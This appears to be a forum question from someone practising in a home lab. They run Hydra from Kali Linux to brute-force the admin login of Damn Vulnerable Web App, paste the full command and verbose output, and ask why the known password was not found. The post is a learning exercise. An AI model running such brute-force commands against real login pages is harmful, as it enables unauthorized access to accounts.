I have VMware Workstation. Metasploitable2 and Damn Vulnerable Web App are running. I am trying to attack it using Hydra in Kali Linux. To save time I created a very small password list and included the real password (password).
Here is the command and the output:
user1@kali:~$ hydra -l admin -P '/home/user1/Desktop/easy.txt' 192.168.203.131 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed" -V
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-03-09 22:03:37
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 8 tasks per 1 server, overall 64 tasks, 8 login tries (l:1/p:8), ~0 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "aaa" - 1 of 8 [child 0]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "bbb" - 2 of 8 [child 1]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "cccc" - 3 of 8 [child 2]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "ddddd" - 4 of 8 [child 3]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "eee" - 5 of 8 [child 4]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "password" - 6 of 8 [child 5]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "dfsdaf" - 7 of 8 [child 6]
[ATTEMPT] target 192.168.203.131 - login "admin" - pass "23456" - 8 of 8 [child 7]
1 of 1 target completed, 0 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-03-09 22:04:20
Here are the contents of easy.txt (notice that password is in there):
aaa
bbb
cccc
ddddd
eee
password
dfsdaf
23456
Why didn't this work? I can log in to DVWA manually using the username: admin and password: password from a web browser. Also, the command takes a couple of minutes to complete.